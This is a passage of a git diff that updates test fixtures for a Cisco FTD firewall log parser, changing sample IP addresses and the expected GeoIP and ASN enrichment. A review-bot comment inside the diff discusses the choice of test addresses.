@@ -4674,14 +4674,14 @@ ], "ip": [ "10.1.1.45", - "192.88.99.1", - "192.88.99.129" + "192.168.99.1", + "192.168.99.129" ] }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768763800Z", - "original": "Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com", + "ingested": "2021-12-09T13:35:10.983289Z", + "original": "Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", "action": "firewall-rule", @@ -4698,8 +4698,8 @@ "ftd": { "destination_interface": "outside", "mapped_source_port": 7890, - "mapped_destination_ip": "192.88.99.129", - "mapped_source_ip": "192.88.99.1", + "mapped_destination_ip": "192.168.99.129", + "mapped_source_ip": "192.168.99.1", "rule_name": "dynamic", "source_interface": "inside", "mapped_destination_port": 80 @@ -4712,11 +4712,11 @@ }, "destination": { "nat": { - "ip": "192.0.2.225" + "ip": "192.168.2.225" }, - "address": "192.0.2.223", + "address": "192.168.2.223", "port": 80, - "ip": "192.0.2.223" + "ip": "192.168.2.223" }, "source": { "nat": { 
@@ -4756,14 +4756,14 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223", - "192.0.2.225" + "192.168.2.223", + "192.168.2.225" ] }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768765300Z", - "original": "Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.225/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:35:10.983294800Z", + "original": "Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.225/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", "action": "firewall-rule", @@ -4780,7 +4780,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.225", + "mapped_destination_ip": "192.168.2.225", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4797,9 +4797,9 @@ "nat": { "port": 8080 }, - "address": "192.0.2.223", + "address": "192.168.2.223", "port": 80, - "ip": "192.0.2.223" + "ip": "192.168.2.223" }, "source": { "nat": { 
@@ -4839,13 +4839,13 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223" + "192.168.2.223" ] }, "event": { "severity": 4, - "ingested": "2021-09-07T12:22:01.768766800Z", - "original": "Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/8080), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:35:10.983316300Z", + "original": "Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/8080), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", "action": "firewall-rule", @@ -4863,7 +4863,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.223", + "mapped_destination_ip": "192.168.2.223", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4877,8 +4877,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "source": { "address": "10.30.30.30", @@ -4903,13 +4903,13 @@ "related": { "ip": [ "10.30.30.30", - "192.0.2.1" + "192.168.2.1" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768768300Z", - "original": "Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app", + "ingested": "2021-12-09T13:35:10.983321600Z", + "original": "Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", "action": "firewall-rule", 
@@ -4931,8 +4931,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.32", - "ip": "192.0.2.32" + "address": "192.168.2.32", + "ip": "192.168.2.32" }, "source": { "address": "10.5.111.32", @@ -4959,13 +4959,13 @@ "related": { "ip": [ "10.5.111.32", - "192.0.2.32" + "192.168.2.32" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768783600Z", - "original": "Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com", + "ingested": "2021-12-09T13:35:10.983326800Z", + "original": "Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", "action": "firewall-rule", @@ -4987,8 +4987,8 @@ "level": "notification" }, "destination": { - "address": "192.0.0.19", - "ip": "192.0.0.19" + "address": "192.168.0.19", + "ip": "192.168.0.19" }, "source": { "address": "10.69.6.39", @@ -5021,13 +5021,13 @@ "related": { "ip": [ "10.69.6.39", - "192.0.0.19" + "192.168.0.19" ] }, "event": { "severity": 5, - "ingested": "2021-09-07T12:22:01.768786400Z", - "original": "Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside", + "ingested": "2021-12-09T13:35:10.983330700Z", + "original": "Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log index c81a41dfb1f..c460849f58e 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log 
@@ -1,10 +1,10 @@
 2019-08-15T16:03:31Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity
 2019-08-15T16:05:33Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity
-2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address
-2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395
-2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity
-2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb
-2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity
-2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip
+2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address
+2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395
+2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity
+2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb
+2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity
+2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip
 2019-08-16T09:35:15Z firepower %FTD-1-430002: AccessControlRuleAction: Block, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Block-inbound-ICMP, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 0, ResponderPackets: 0, InitiatorBytes: 0, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity
 Aug 14 2019 15:09:41 siem-ftd %FTD-1-430003: AccessControlRuleAction: Block, AccessControlRuleReason: File Block, SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, IngressInterface: input, EgressInterface: output, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 1, FileCount: 1, InitiatorPackets: 4, ResponderPackets: 7, InitiatorBytes: 365, ResponderBytes: 1927, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: 10.0.100.30:8000, URL: http://10.0.100.30:8000/eicar_com.zip
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json
index 96ccc5b8bbe..6fed9b7418c 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json
@@ -62,7 +62,7 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-09-07T12:22:07.428840500Z",
+ "ingested": "2021-12-09T13:35:19.255488700Z",
 "original": "2019-08-15T16:03:31Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity",
 "code": "430002",
 "kind": "event",
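Review bot: All six rewritten lines now carry the same `DstIP: 81.2.69.144` for the two DNS resolver flows (port 53) and the four HTTP flows (port 80), where the removed lines used three distinct destinations, so the fixture no longer yields differing `destination.geo`/`destination.as` enrichment across events and the HTTP lines' `ReferencedHost` values (`eu-central-1.ec2.archive.ubuntu.com`, `www.eicar.org`) now share one address with the resolver that was queried for them. 81.2.69.144 is one of the addresses in MaxMind's GeoLite2 test database, which is presumably why it was chosen; if that set offers more than one address, giving the HTTP flows a different one from the DNS flows keeps the per-event expectations distinguishable. Since a `.log` fixture cannot carry a comment, a sentence in the data stream's pipeline-test README stating that the public addresses are deliberately drawn from the GeoIP test database would stop a later editor from "correcting" them back to real resolvers or mirrors.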
@@ -178,7 +178,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-09-07T12:22:07.428852900Z", + "ingested": "2021-12-09T13:35:19.255497100Z", "original": "2019-08-15T16:05:33Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity", "code": "430003", "kind": "event", @@ -247,24 +247,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 0, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 0 }, "source": { @@ -312,7 +315,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { 
@@ -320,8 +323,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-07T12:22:07.428854200Z", - "original": "2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", + "ingested": "2021-12-09T13:35:19.255502700Z", + "original": "2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", "code": "430002", "kind": "event", "action": "connection-started", @@ -353,7 +356,7 @@ "prefilter_policy": "Default Prefilter Policy", "nap_policy": "Balanced Security and Connectivity", "ingress_zone": "input-zone", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_port": "50074", "src_ip": "10.0.1.20", 
@@ -388,24 +391,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 314,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 2
 },
 "source": {
@@ -453,7 +459,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -462,8 +468,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:22:07.428855300Z",
- "original": "2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395",
+ "ingested": "2021-12-09T13:35:19.255508Z",
+ "original": "2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-15T16:07:00.000Z",
@@ -493,7 +499,7 @@
 "dns_query": "siem-inside",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -529,26 +535,26 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "DE-HE",
- "city_name": "Frankfurt am Main",
- "country_iso_code": "DE",
- "country_name": "Germany",
- "region_name": "Hesse",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 8.6843,
- "lat": 50.1188
+ "lon": -1.3614,
+ "lat": 51.7095
 }
 },
 "as": {
- "number": 16509,
+ "number": 20712,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "52.59.244.233",
+ "address": "81.2.69.144",
 "port": 80,
 "bytes": 74,
- "ip": "52.59.244.233",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -594,7 +600,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "52.59.244.233"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -602,8 +608,8 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-09-07T12:22:07.428856300Z",
- "original": "2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity",
+ "ingested": "2021-12-09T13:35:19.255513300Z",
+ "original": "2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity",
 "code": "430002",
 "kind": "event",
 "action": "connection-started",
@@ -633,7 +639,7 @@
 "prefilter_policy": "Default Prefilter Policy",
 "nap_policy": "Balanced Security and Connectivity",
 "ingress_zone": "input-zone",
- "dst_ip": "52.59.244.233",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_port": "43228",
 "src_ip": "10.0.1.20",
@@ -660,26 +666,26 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "DE-HE",
- "city_name": "Frankfurt am Main",
- "country_iso_code": "DE",
- "country_name": "Germany",
- "region_name": "Hesse",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 8.6843,
- "lat": 50.1188
+ "lon": -1.3614,
+ "lat": 51.7095
 }
 },
 "as": {
- "number": 16509,
+ "number": 20712,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "52.59.244.233",
+ "address": "81.2.69.144",
 "port": 80,
 "bytes": 41319018,
- "ip": "52.59.244.233",
+ "ip": "81.2.69.144",
 "packets": 29001
 },
 "source": {
@@ -737,7 +743,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "52.59.244.233"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -751,8 +757,8 @@
 "event": {
 "severity": 1,
 "duration": 1000000000,
- "ingested": "2021-09-07T12:22:07.428857300Z",
